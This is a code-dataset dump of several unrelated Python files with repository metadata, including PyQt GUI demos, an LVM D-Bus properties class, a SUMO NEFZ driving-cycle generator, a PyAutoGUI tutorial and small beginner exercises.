self.label.setMinimumSize(QtCore.QSize(0, 18))
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 4, 0, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem1, 5, 0, 1, 1)
self.groupBox = QtWidgets.QGroupBox(Form)
self.groupBox.setTitle("")
self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.groupBox.setFlat(False)
self.groupBox.setObjectName("groupBox")
self.freieFertsGrid = QtWidgets.QGridLayout(self.groupBox)
self.freieFertsGrid.setContentsMargins(20, 20, 20, 20)
self.freieFertsGrid.setObjectName("freieFertsGrid")
self.gridLayout.addWidget(self.groupBox, 2, 0, 1, 1)
self.labelRegeln = QtWidgets.QLabel(Form)
self.labelRegeln.setAlignment(QtCore.Qt.AlignCenter)
self.labelRegeln.setObjectName("labelRegeln")
self.gridLayout.addWidget(self.labelRegeln, 3, 0, 1, 1)
self.gridLayout_3.addLayout(self.gridLayout, 0, 0, 1, 1)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.label.setText(_translate("Form", "Der erste Eintrag ist die Muttersprache des Charakters.\n"
"Jeder Charakter beherrscht seine Muttersprache meisterlich, ohne dafür zu bezahlen."))
self.labelRegeln.setText(_translate("Form", "Freie Fertigkeiten sind in drei Stufen geteilt: Unerfahren (I), erfahren (II) und meisterlich (III)."))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec_())
| 44.537313 | 156 | 0.702748 |
c036d64299ea73f594f3e7274d7746722758b468
| 329 |
py
|
Python
|
backend/fakebox/models/player.py
|
teodorvoicencu/FakeBox
|
f14ca83643894d9d0761294cfce511a52401de68
|
[
"MIT"
] | null | null | null |
backend/fakebox/models/player.py
|
teodorvoicencu/FakeBox
|
f14ca83643894d9d0761294cfce511a52401de68
|
[
"MIT"
] | null | null | null |
backend/fakebox/models/player.py
|
teodorvoicencu/FakeBox
|
f14ca83643894d9d0761294cfce511a52401de68
|
[
"MIT"
] | null | null | null |
class Player:
def __init__(self, player_id: int, nickname: str, websocket, is_vip: bool = False):
self.player_id = player_id
self.nickname = nickname
self.is_vip = is_vip
self.websocket = websocket
def __repr__(self):
return 'Player({}, {})'.format(self.player_id, self.nickname)
| 32.9 | 87 | 0.641337 |
97eb068e3b56a2721bae8b3d960ae96d868aea8a
| 924 |
py
|
Python
|
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 8 |
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
cs/lambda_cs/05_hash_tables_and_blockchain/Hash-Tables/notes/longest_linked_list_chain.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
def longest_linked_list_chain(keys, buckets, loops=10):
"""
Rolls `keys` number of random keys into `buckets` buckets
and counts the collisions.
Run `loops` number of times.
"""
for i in range(loops):
key_counts = {}
for i in range(buckets):
key_counts[i] = 0
for i in range(keys):
random_key = str(random.random())
hash_index = hash(random_key) % buckets
key_counts[hash_index] += 1
largest_n = 0
for key in key_counts:
if key_counts[key] > largest_n:
largest_n = key_counts[key]
print(
f"Longest Linked List Chain for {keys} keys in {buckets} buckets (Load Factor: {keys/buckets:.2f}): {largest_n}"
)
longest_linked_list_chain(4, 16, 5)
longest_linked_list_chain(16, 16, 5)
longest_linked_list_chain(32, 16, 5)
longest_linked_list_chain(1024, 128, 5)
| 31.862069 | 124 | 0.611472 |
e188fa4d523ec6ccd55ce55e698060c3b7fa8330
| 6,409 |
py
|
Python
|
hihope_neptune-oh_hid/00_src/v0.1/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | 1 |
2022-02-15T08:51:55.000Z
|
2022-02-15T08:51:55.000Z
|
hihope_neptune-oh_hid/00_src/v0.3/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
hihope_neptune-oh_hid/00_src/v0.3/third_party/LVM2/daemons/lvmdbusd/automatedproperties.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2015-2016 Red Hat, Inc. All rights reserved.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions
# of the GNU General Public License v.2.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import dbus
import dbus.service
from . import cfg
from .utils import get_properties, add_properties, get_object_property_diff, \
log_debug
from .state import State
# noinspection PyPep8Naming,PyUnresolvedReferences
class AutomatedProperties(dbus.service.Object):
"""
This class implements the needed interfaces for:
org.freedesktop.DBus.Properties
Other classes inherit from it to get the same behavior
"""
def __init__(self, object_path, search_method=None):
dbus.service.Object.__init__(self, cfg.bus, object_path)
self._ap_interface = []
self._ap_o_path = object_path
self._ap_search_method = search_method
self.state = None
def dbus_object_path(self):
return self._ap_o_path
def emit_data(self):
props = {}
for i in self.interface():
props[i] = AutomatedProperties._get_all_prop(self, i)
return self._ap_o_path, props
def set_interface(self, interface):
"""
With inheritance we can't easily tell what interfaces a class provides
so we will have each class that implements an interface tell the
base AutomatedProperties what it is they do provide. This is kind of
clunky and perhaps we can figure out a better way to do this later.
:param interface: An interface the object supports
:return:
"""
if interface not in self._ap_interface:
self._ap_interface.append(interface)
# noinspection PyUnusedLocal
def interface(self, all_interfaces=False):
if all_interfaces:
cpy = list(self._ap_interface)
cpy.extend(
["org.freedesktop.DBus.Introspectable",
"org.freedesktop.DBus.Properties"])
return cpy
return self._ap_interface
@staticmethod
def _get_prop(obj, interface_name, property_name):
value = getattr(obj, property_name)
# Note: If we get an exception in this handler we won't know about it,
# only the side effect of no returned value!
log_debug('Get (%s), type (%s), value(%s)' %
(property_name, str(type(value)), str(value)))
return value
# Properties
# noinspection PyUnusedLocal
@dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,
in_signature='ss', out_signature='v',
async_callbacks=('cb', 'cbe'))
def Get(self, interface_name, property_name, cb, cbe):
# Note: If we get an exception in this handler we won't know about it,
# only the side effect of no returned value!
r = cfg.create_request_entry(
-1, AutomatedProperties._get_prop,
(self, interface_name, property_name),
cb, cbe, False)
cfg.worker_q.put(r)
@staticmethod
def _get_all_prop(obj, interface_name):
if interface_name in obj.interface(True):
# Using introspection, lets build this dynamically
properties = get_properties(obj)
if interface_name in properties:
return properties[interface_name][1]
return {}
raise dbus.exceptions.DBusException(
obj._ap_interface,
'The object %s does not implement the %s interface'
% (obj.__class__, interface_name))
@dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,
in_signature='s', out_signature='a{sv}',
async_callbacks=('cb', 'cbe'))
def GetAll(self, interface_name, cb, cbe):
r = cfg.create_request_entry(
-1, AutomatedProperties._get_all_prop,
(self, interface_name),
cb, cbe, False)
cfg.worker_q.put(r)
@dbus.service.method(dbus_interface=dbus.PROPERTIES_IFACE,
in_signature='ssv')
def Set(self, interface_name, property_name, new_value):
setattr(self, property_name, new_value)
self.PropertiesChanged(interface_name,
{property_name: new_value}, [])
# As dbus-python does not support introspection for properties we will
# get the autogenerated xml and then add our wanted properties to it.
@dbus.service.method(dbus_interface=dbus.INTROSPECTABLE_IFACE,
out_signature='s')
def Introspect(self):
r = dbus.service.Object.Introspect(self, self._ap_o_path, cfg.bus)
# Look at the properties in the class
props = get_properties(self)
for int_f, v in props.items():
r = add_properties(r, int_f, v[0])
return r
@dbus.service.signal(dbus_interface=dbus.PROPERTIES_IFACE,
signature='sa{sv}as')
def PropertiesChanged(self, interface_name, changed_properties,
invalidated_properties):
log_debug(('SIGNAL: PropertiesChanged(%s, %s, %s, %s)' %
(str(self._ap_o_path), str(interface_name),
str(changed_properties), str(invalidated_properties))))
def refresh(self, search_key=None, object_state=None):
"""
Take the values (properties) of an object and update them with what
lvm currently has. You can either fetch the new ones or supply the
new state to be updated with
:param search_key: The value to use to search for
:param object_state: Use this as the new object state
"""
num_changed = 0
# If we can't do a lookup, bail now, this happens if we blindly walk
# through all dbus objects as some don't have a search method, like
# 'Manager' object.
if not self._ap_search_method:
return
search = self.lvm_id
if search_key:
search = search_key
# Either we have the new object state or we need to go fetch it
if object_state:
new_state = object_state
else:
new_state = self._ap_search_method([search])[0]
assert isinstance(new_state, State)
assert new_state
# When we refresh an object the object identifiers might have changed
# because LVM allows the user to change them (name & uuid), thus if
# they have changed we need to update the object manager so that
# look-ups will happen correctly
old_id = self.state.identifiers()
new_id = new_state.identifiers()
if old_id[0] != new_id[0] or old_id[1] != new_id[1]:
cfg.om.lookup_update(self, new_id[0], new_id[1])
# Grab the properties values, then replace the state of the object
# and retrieve the new values.
o_prop = get_properties(self)
self.state = new_state
n_prop = get_properties(self)
changed = get_object_property_diff(o_prop, n_prop)
if changed:
for int_f, v in changed.items():
self.PropertiesChanged(int_f, v, [])
num_changed += 1
return num_changed
| 32.866667 | 78 | 0.73428 |
55cdd1e45a11845aec8414b82e74156ad78c9607
| 2,654 |
py
|
Python
|
scripts/qt2/pyqt_sw23a_MouseEvent.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
scripts/qt2/pyqt_sw23a_MouseEvent.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
scripts/qt2/pyqt_sw23a_MouseEvent.py
|
ProfJust/Ruhr-TurtleBot-Competition-RTC-
|
5c2425bee331b4d5033757a9425676932d111775
|
[
"Unlicense",
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#pyqt_sw23_MouseEvent.py
import sys
from PyQt5.QtCore import (Qt, QTimer, QRect)
from PyQt5.QtWidgets import (QWidget, QPushButton, QApplication, QLabel)
from PyQt5.QtGui import QPainter, QColor, QFont
from PyQt5.QtGui import QPixmap, QKeyEvent
class Ui(QWidget):
#statische Klassenvariablen
mouse_pos_x = 0
mouse_pos_y = 0
def __init__(self): #Konstrukor
#Konstruktor der Elternklasse aufrufen
super(Ui, self).__init__()
self.initUI()
def initUI(self):
#UI-Fenster Konfigurieren
self.setGeometry(30, 30, 600, 600)
self.setWindowTitle('Qt - Mouse Event')
self.setMouseTracking(True)
self.show()
def mouseMoveEvent(self, event): #Methode der QWidget-Klasse
self.mouse_pos_x = event.x()
self.mouse_pos_y = event.y()
#print Mouse Position
print('x: %d y: %d' % (self.mouse_pos_x, self.mouse_pos_y))
def mousePressEvent(self, event): #Methode der QWidget-Klasse
if event.button()== Qt.LeftButton:
print('Linksklick')
if event.button()== Qt.RightButton:
print("Rechtsklick")
def mouseDoubleClickEvent(self, event): #Methode der QWidget-Klasse
if event.button()== Qt.LeftButton:
print('Linksklick doppelt, mit Rechtsklick doppelt wird es wieder klein')
#self.showMaximized() #mit Titelzeile
self.showFullScreen() #ohne Titelzeile
if event.button()== Qt.RightButton:
print("Rechtsklick doppelt")
self.showNormal() #urspruengiche Groesse
#self.showMinimized() #ganz weg
def paintEvent(self, event): #Methode der QWidget-Klasse
p = QPainter()
p.begin(self)
self.drawFunc(event, p)
p.end()
def keyPressEvent(self, event): #Methode der QWidget-Klasse
if event.key() == Qt.Key_Left:
self.keyLeft = True
if event.key() == Qt.Key_Right:
self.keyRight = True
def keyReleaseEvent(self, event): #Methode der QWidget-Klasse
if event.key() == Qt.Key_Left:
self.keyLeft = False
if event.key() == Qt.Key_Right:
self.keyRight = False
event.accept()
def drawFunc(self, event, p):
#Hintergrund mit Pixmap
pix = QPixmap("gras.jpg")
p.drawPixmap(self.rect(),pix)
if __name__ == '__main__':
app = QApplication(sys.argv)
ui = Ui()
sys.exit(app.exec_())
| 33.175 | 85 | 0.589676 |
e9e5ca591180e68e5942d7efb72a444d291477f7
| 77 |
py
|
Python
|
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/CodingBat/Python/Warmup-01/03-sum_double.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
def sum_double(a, b):
if a == b:
return (a+b)*2
else:
return a+b
| 12.833333 | 21 | 0.519481 |
a15ced1edd95d5755d2aa895aec50099e9ad43f2
| 448 |
py
|
Python
|
src/onegov/org/models/recipient.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/models/recipient.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/org/models/recipient.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm.mixins import content_property
from onegov.recipient import GenericRecipient, GenericRecipientCollection
class ResourceRecipient(GenericRecipient):
__mapper_args__ = {'polymorphic_identity': 'resource'}
send_on = content_property()
resources = content_property()
class ResourceRecipientCollection(GenericRecipientCollection):
def __init__(self, session):
super().__init__(session, type='resource')
| 29.866667 | 73 | 0.787946 |
3d740609ff1f485574f2febbb5422c34d0cb75ed
| 3,146 |
py
|
Python
|
PMIa/2015/NIKISHIN_P_S/task_10_22.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/NIKISHIN_P_S/task_10_22.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/NIKISHIN_P_S/task_10_22.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 10. Вариант 22.
# 1-50. Напишите программу "Генератор персонажей" для игры. Пользователю должно быть предоставлено 30 пунктов, которые можно распределить между четырьмя характеристиками: Сила, Здоровье, Мудрость и Ловкость. Надо сделать так, чтобы пользователь мог не только брать эти пункты из общего "пула", но и возвращать их туда из характеристик, которым он решил присвоить другие значения.
# Nikishin P. S.
# 27.05.2016
pool = 40
score = 40
hero = {"Сила":"0","Здоровье":"0","Мудрость":"0","Ловкость":"0"}
points = 0
menu = None
while menu != 0:
print("""
0 - Выход
1 - Добавить пункты к характеристикам
2 - Уменьшить пункты характеристик
3 - Просмотр характеристик""")
menu = int(input("Выберите действие: "))
if menu == 1:
print("Пожалуйста, введите характеристику для добавления пунктов. Для изменения доступны", len(hero), "характеристики:")
for a in hero:
print(a)
harak = str(input("\nВедите характеристику: "))
harak = harak.title()
while harak not in hero:
print("Такая характеристика отсутствует: ")
harak = str(input("\nВедите характеристику: "))
harak = harak.title()
else:
print("\nВведите количество пунктов,которое вы хотите назначить данной характеристике")
print("Доступно",score, "пунктов")
points = int(input("\nВведите количество пунктов:"))
while points > score or points < 0:
print("Вы не можете назначить такое количество пунктов")
print("Доступно", score, "пунктов")
points = int(input("\nВведите количество пунктов:"))
hero[harak] = points
print(points, "пунктов добавлено к", harak)
score -= points
elif menu == 2:
print("Пожалуйста, введите имя характеристики для снятия пунктов." "Доступно изменение для: ")
for a in hero:
if int(hero[a]) > 0:
print(a)
harak = str(input("\Ведите характеристикуn:"))
harak = harak.title()
while harak not in hero:
print("Нет такой характеристики, проверьте введенные данные: ")
harak = str(input("\nВедите характеристику:"))
harak = harak.title()
else:
print("\nВведите количество пунктов для характеристики. Доступно", hero[harak], "пунктов:")
points = int(input("\n:"))
while points > int(hero[harak]) or points < 0:
print("Невозможно удалить такое количество пунктов. Доступно", hero[harak], "пунктов")
points = int(input("\nВведите количество пунктов:"))
hero[harak] = points
print(points, "пунктов удалено")
score += points
elif menu == 3:
print("\nХарактеристики героя")
for a in hero:
print(a, "\t\t", hero[a])
elif menu == 0:
print("Досвидания! Всего наилучшего!")
else:
print("В меню отсутствует запрашиваемый пункт")
| 37.903614 | 379 | 0.587095 |
3def1b29e37a332d4d958bd4bd88114812ae6bb1
| 119 |
py
|
Python
|
crawlab/tasks/celery.py
|
anhilo/crawlab
|
363f4bf7a4ccc192a99850998c1bd0fc363832a1
|
[
"BSD-3-Clause"
] | 1 |
2019-08-20T14:26:39.000Z
|
2019-08-20T14:26:39.000Z
|
crawlab/tasks/celery.py
|
anhilo/crawlab
|
363f4bf7a4ccc192a99850998c1bd0fc363832a1
|
[
"BSD-3-Clause"
] | 9 |
2019-05-24T03:53:09.000Z
|
2022-02-26T10:53:48.000Z
|
crawlab/tasks/celery.py
|
anhilo/crawlab
|
363f4bf7a4ccc192a99850998c1bd0fc363832a1
|
[
"BSD-3-Clause"
] | 1 |
2019-11-08T08:12:40.000Z
|
2019-11-08T08:12:40.000Z
|
from celery import Celery
# celery app instance
celery_app = Celery(__name__)
celery_app.config_from_object('config')
| 19.833333 | 39 | 0.815126 |
9adc7243f4d1b70f6873f955bafaa824462615fa
| 249 |
py
|
Python
|
Licence 2/I33/TP 4/ex_9.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 8 |
2020-11-26T20:45:12.000Z
|
2021-11-29T15:46:22.000Z
|
Licence 2/I33/TP 4/ex_9.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | null | null | null |
Licence 2/I33/TP 4/ex_9.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 6 |
2020-10-23T15:29:24.000Z
|
2021-05-05T19:10:45.000Z
|
import random
def liste_perm(n):
L = []
for i in range(n):
L += [i]
i = 1
while i < n:
perm = random.randrange(0, n-i)
tmp = L[perm]
L[perm] = L[n-i]
L[n-i] = tmp
i += 1
return L
| 15.5625 | 39 | 0.413655 |
b11713ccbb2131e4e20add32f21fdefe3fa8d9a0
| 4,015 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/emissions/nefz.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
#!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2012-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file nefz.py
# @author [email protected]
# @date 2014-01-14
"""
Generates a ';'-separated file that contains the time line of the NEFZ
driving cycle.
"""
from __future__ import print_function
NEFZ1 = [
[11, 0, 0],
[4, 1.04, -1], [0, 0, 15],
[8, 0, 15],
[2, -0.69, -1], [0, 0, 10],
[3, -.93, -1], [0, 0, 0],
[21, 0, 0],
[5, 0.83, -1], [0, 0, 15],
[2, 0, -1],
[5, 0.94, -1], [0, 0, 32],
[24, 0, 32],
[8, -.76, -1], [0, 0, 10],
[3, -.93, -1], [0, 0, 0],
[21, 0, 0],
[5, .83, -1], [0, 0, 15],
[2, 0, -1],
[9, .62, -1], [0, 0, 35],
[2, 0, -1],
[8, .52, -1], [0, 0, 50],
[12, 0, 50],
[8, -.52, -1], [0, 0, 35],
[13, 0, 35],
[2, 0, -1],
[7, -.87, -1], [0, 0, 10],
[3, -.93, -1], [0, 0, 0],
[7, 0, 0],
]
NEFZ2 = [
[20, 0, 0],
[5, .83, -1], [0, 0, 15],
[2, 0, -1],
[9, .62, -1], [0, 0, 35],
[2, 0, -1],
[8, .52, -1], [0, 0, 50],
[2, 0, -1],
[13, .43, -1], [0, 0, 70],
[50, 0, 70],
[8, -.69, -1], [0, 0, 50],
[69, 0, 50],
[13, .43, -1], [0, 0, 70],
[50, 0, 70],
[35, .24, -1], [0, 0, 100],
[30, 0, 100],
[20, .28, -1], [0, 0, 120],
[10, 0, 120],
[16, -.69, -1], [0, 0, 80],
[8, -1.04, -1], [0, 0, 50],
[10, -1.39, -1], [0, 0, 0],
[20, 0, 0]
]
def build(what):
t = 0
v = 0
a = 0
ts1 = []
vs1 = []
as1 = []
ts2 = []
vs2 = []
as2 = []
ts3 = []
vs3 = []
as3 = []
ct = 0
cv = 0
lv = 0
lt = 0
ts1.append(0)
as1.append(0)
vs1.append(0)
for tav in what:
[t, a, v] = tav[:3]
v = v / 3.6
if v >= 0:
# destination velocity
if a != 0:
print("ups %s" % tav)
ts1.append(ct + t)
as1.append(0)
vs1.append(v)
# via acceleration
for it in range(0, t):
ts2.append(ct + it)
as2.append(a)
mv = cv + a * float(it)
if mv < 0:
mv = 0
vs2.append(mv)
# via speed (if not None, otherwise "keep in mind")
if v >= 0:
dt = float((ct + t) - lt)
if dt != 0:
dv = float(v - lv)
a = dv / float(dt)
for it in range(lt, ct + t):
ts3.append(it)
as3.append(a)
vs3.append(lv + a * float(it - lt))
ct = ct + t
if v >= 0:
cv = v
lv = v
lt = ct
return [ts1, vs1, as1, ts2, vs2, as2, ts3, vs3, as3]
BASE = 3
ts = []
vs = []
ts1 = []
vs1 = []
ts2 = []
vs2 = []
ts3 = []
vs3 = []
t = 0
for c in [NEFZ1, NEFZ1, NEFZ1, NEFZ1, NEFZ2]:
tmp = build(c)
for i in range(0, len(tmp[BASE])):
ts.append(tmp[BASE][i] + t)
vs.append(tmp[BASE + 1][i])
# ts1.append(tmp[0][i]+t)
# vs1.append(tmp[0+1][i])
# ts2.append(tmp[3][i]+t)
# vs2.append(tmp[3+1][i])
# ts3.append(tmp[6][i]+t)
# vs3.append(tmp[6+1][i])
t = t + tmp[BASE][-1] + 1
fdo = open("nefz.csv", "w")
pv = 0
for i in range(0, len(ts)):
fdo.write("%s;%s;%s\n" % (ts[i], vs[i] * 3.6, pv - vs[i]))
pv = vs[i]
fdo.close()
| 24.041916 | 77 | 0.440349 |
49516b57d0d0f33dd71e42650cd7a6279ade8bcf
| 1,629 |
py
|
Python
|
books/PythonAutomate/gui_automate/pyautogui_sample.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/PythonAutomate/gui_automate/pyautogui_sample.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/PythonAutomate/gui_automate/pyautogui_sample.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import time
import pyautogui
# 주 모니터 사이즈 얻기
screen_width, screen_height = pyautogui.size()
"""마우스"""
current_mouse_x, current_mouse_y = pyautogui.position() # 마우스 X, Y 좌표 얻기
pyautogui.moveTo(100, 150, duration=0.25) # 마우스 이동 0.25초 동안 이동
pyautogui.click() # 마우스 클릭
pyautogui.click(100, 200, duration=1) # 마우스 좌표 1초 동안 이동 후 클릭
pyautogui.click(500, 300, button="right", duration=0.25) # 마우스 오른쪽 버튼 클릭
pyautogui.click(500, 300, button="left", duration=0.25) # 마우스 왼쪽 버튼 클릭
pyautogui.click("help_icon.png") # help_icon.png 파일을 스크린 상에서 찾아 클릭
# 상대 좌표 이동
for i in range(3):
pyautogui.move(100, 0, duration=0.25) # 오른쪽
pyautogui.move(0, 100, duration=0.25) # 아래
pyautogui.move(-100, 0, duration=0.25) # 왼쪽
pyautogui.move(0, -100, duration=0.25) # 위
# 마우스 끌기
pyautogui.click() # 현재 윈도우창 활성화
distance = 200
change = 20
while distance > 0:
pyautogui.drag(distance, 0, duration=0.2) # 오른쪽
distance = distance - change
pyautogui.drag(0, distance, duration=0.2) # 아래
pyautogui.drag(-distance, 0, duration=0.2) # 왼쪽
distance = distance - change
pyautogui.drag(0, -distance, duration=0.2) # 위
# 마우스 스크롤 (양수: 올리기, 음수: 내리기)
pyautogui.scroll(-100)
"""키보드"""
pyautogui.write("Hello world!", interval=0.25) # 각각의 문자마다 0.25초 간격으로 입력
pyautogui.press("esc") # Esc 입력, 키 명칭은 pyautogui.KEY_NAMES에 있음
pyautogui.keyDown("shift") # shift 키 누른 상태로 유지
pyautogui.press(["left", "left", "left", "left"]) # 왼쪽 화살표 키 4번 입력
pyautogui.keyUp("shift") # shift 키 떼기
pyautogui.hotkey("ctrl", "c") # Ctrl-C hotkey 조합 입력
pyautogui.alert("This is the message to display.") # 경고창 띄우고 OK 누를 때 까지 프로그램 중지
| 33.244898 | 80 | 0.675261 |
4978c2185db81f3c0ea3ab2b2820e34016c557b7
| 584 |
py
|
Python
|
torba/torba/tasks.py
|
mittalkartik2000/lbry-sdk
|
a07b17ec0c9c5d0a88bc730caf6ab955e0971b38
|
[
"MIT"
] | 4,076 |
2018-06-01T05:54:24.000Z
|
2022-03-07T21:05:52.000Z
|
torba/torba/tasks.py
|
mittalkartik2000/lbry-sdk
|
a07b17ec0c9c5d0a88bc730caf6ab955e0971b38
|
[
"MIT"
] | 80 |
2018-06-14T01:02:03.000Z
|
2019-06-19T10:45:39.000Z
|
torba/torba/tasks.py
|
braveheart12/lbry-sdk
|
dc709b468f9dce60d206161785def5c7ace2b763
|
[
"MIT"
] | 20 |
2018-06-27T21:52:22.000Z
|
2022-03-08T11:25:23.000Z
|
from asyncio import Event, get_event_loop
class TaskGroup:
def __init__(self, loop=None):
self._loop = loop or get_event_loop()
self._tasks = set()
self.done = Event()
def add(self, coro):
task = self._loop.create_task(coro)
self._tasks.add(task)
self.done.clear()
task.add_done_callback(self._remove)
return task
def _remove(self, task):
self._tasks.remove(task)
len(self._tasks) < 1 and self.done.set()
def cancel(self):
for task in self._tasks:
task.cancel()
| 23.36 | 48 | 0.599315 |
b8d75f3e6a3776837c546ec4202d1c291ff9e457
| 942 |
py
|
Python
|
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L03_ConditionalStatementsAdvanced/Exercises/Solutions/P03_NewHouse.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | 1 |
2022-02-23T13:03:14.000Z
|
2022-02-23T13:03:14.000Z
|
flowers = input()
qty = int(input())
budget = int(input())
price = 0
Roses = 5
Dahlias = 3.8
Tulips = 2.8
Narcissus = 3
Gladiolus = 2.5
if flowers == "Roses":
if qty > 80:
price = Roses * qty * 0.9
else:
price = Roses * qty
elif flowers == "Dahlias":
if qty > 90:
price = Dahlias * qty * 0.85
else:
price = Dahlias * qty
elif flowers == "Tulips":
if qty > 80:
price = Tulips * qty * 0.85
else:
price = Tulips * qty
elif flowers == "Narcissus":
if qty < 120:
price = Narcissus * qty * 1.15
else:
price = Narcissus * qty
elif flowers == "Gladiolus":
if qty < 80:
price = Gladiolus * qty * 1.2
else:
price = Gladiolus * qty
if price > budget:
print(f'Not enough money, you need {price - budget:.2f} leva more.')
else:
print(f'Hey, you have a great garden with {qty} {flowers} and {budget - price:.2f} leva left.')
